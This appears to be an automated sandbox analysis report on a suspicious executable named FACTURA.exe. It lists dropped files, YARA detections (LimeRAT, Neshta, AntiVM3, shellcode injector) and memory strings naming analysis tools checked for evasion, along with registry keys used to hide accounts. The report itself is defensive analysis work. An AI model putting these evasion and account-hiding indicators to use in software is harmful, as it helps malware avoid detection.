Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpAzSubmit.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ka-GE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gu-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kn-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mi-NZ\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sv-SE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSvc.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\mpextms.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpClient.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpCommu.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ms-MY\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MsMpLics.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\el-GR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pl-PL\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lo-LA\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ta-IN\mpuxagent.dll.mui Jump to dropped file

Boot Survival:

barindex
Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection:

barindex
May modify the system service descriptor table (often done to hook functions)
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp Binary or memory string: KeServiceDescriptorTable
Contains functionality to hide user accounts
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp String found in binary or memory: DOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationXHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\\CertificateRevocationSHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*SHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\5.0\USER AGENT\\*DHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*DHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXT\PREAPPROVED\*\\*LHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\WindowsUpdate\Auto Update\\*>HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*WHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\SpecialAccounts\UserList\\*>HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKLM\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*JHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON\\*@HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOADLHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\LOAD?HKCU\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUNKHKCU\SOFTWARE\Wow6432Node\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS\\RUN^HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\*(1)\\DEBUGGERIHKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*IHKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\PACKAGEDAPPXDEBUG\*(1)\\*WHKCU\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHWHKLM\SOFTWARE\CLASSES\ACTIVATABLECLASSES\PACKAGE\*(1)\DEBUGINFORMATION\*(1)\\DEBUGPATHKHKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SYSTEMRESTORE\\DISABLESR+HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\\*/HKLM\SOFTWARE\MICROSOFT\SECURITY CENTER\SVC\\*>HKLM\Software\Microsoft\Windows Defender Security Center\*\\*-HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*-HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\\*2HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*2HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\\*6HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*6HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\EUPP\DSP\\*GHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DOWNLOAD\\CHECKEXESIGNATURESEHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\DESKTOP\GENERAL\\WALLPAPERDHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\PHISHINGFILTER\\ENABLEDV8AHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*AHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\APPROVED EXTENSIONS\\*HHKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*HHKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\\*
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\FACTURA.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 36.3.MpSigStub.exe.197a433f6c2.83.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a4673aed.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6333813745.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6336709311.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6290353787.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6329279249.00000197A33E4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6294532862.00000197A39F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected LimeRAT
Source: Yara match File source: 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected generic Shellcode Injector
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Windows Security Disabler
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp Binary or memory string: HOOKEXPLORER.EXE
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp Binary or memory string: AUTORUNSC.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: SUPERANTISPYWARE.EXE
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: PEID.EXE
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp Binary or memory string: APISPY.EXE
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp Binary or memory string: !#BM_COPYRENAMEDINAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp Binary or memory string: API_LOG.DLL
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp Binary or memory string: WINDBG.EXE
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: !E!#BM_COPYRENAMEDONAME_PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: !#SLF:AGGR:COPYRENAMED!PROCMON.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: "G!#BM_COPYRENAMEDONAME_AUTORUNS.EXE
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp Binary or memory string: "H!#SLF:AGGR:COPYRENAMED!PROCMON.EXE
